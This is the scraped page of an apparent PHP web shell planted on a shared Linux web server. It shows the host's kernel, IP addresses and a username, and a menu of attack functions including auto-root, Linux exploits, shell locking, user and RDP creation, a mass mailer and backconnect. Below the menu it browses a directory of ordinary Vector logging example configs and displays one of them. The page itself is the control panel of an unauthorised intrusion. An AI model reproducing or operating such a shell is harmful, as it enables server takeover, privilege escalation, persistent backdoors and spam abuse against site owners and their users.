Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
vector /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
docs_example.yaml
1.48
KB
-rw-r--r--
environment_variables.yaml
1.16
KB
-rw-r--r--
es_s3_hybrid.yaml
1.27
KB
-rw-r--r--
file_to_cloudwatch_metrics.yam...
1.07
KB
-rw-r--r--
file_to_prometheus.yaml
1.29
KB
-rw-r--r--
prometheus_to_console.yaml
461
B
-rw-r--r--
stdio.yaml
354
B
-rw-r--r--
wrapped_json.yaml
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : es_s3_hybrid.yaml
# Elasticsearch / S3 Hybrid Vector Configuration Example # ------------------------------------------------------------------------------ # This demonstrates a hybrid pipeline, writing data to both Elasticsearch and # AWS S3. This is advantageous because each storage helps to offset its # counterpart's weaknesses. You can provision Elasticsearch for performance # and delegate durability to S3. data_dir: "/var/lib/vector" # Ingest data by tailing one or more files # Docs: https://vector.dev/docs/reference/sources/file sources: apache_logs: type: "file" include: ["/var/log/*.log"] ignore_older_secs: 86400 # 1 day # Optionally parse, structure and transform data here. # Docs: https://vector.dev/docs/reference/transforms # Send structured data to Elasticsearch for searching of recent data sinks: es_cluster: inputs: ["apache_logs"] type: "elasticsearch" endpoint: "79.12.221.222:9200" doc_type: "_doc" # Send structured data to S3, a durable long-term storage s3_archives: inputs: ["apache_logs"] # don't sample type: "aws_s3" region: "us-east-1" bucket: "my_log_archives" framing: method: "newline_delimited" encoding: codec: "json" compression: "gzip" batch: max_size: 10000000 # 10mb uncompressed
Close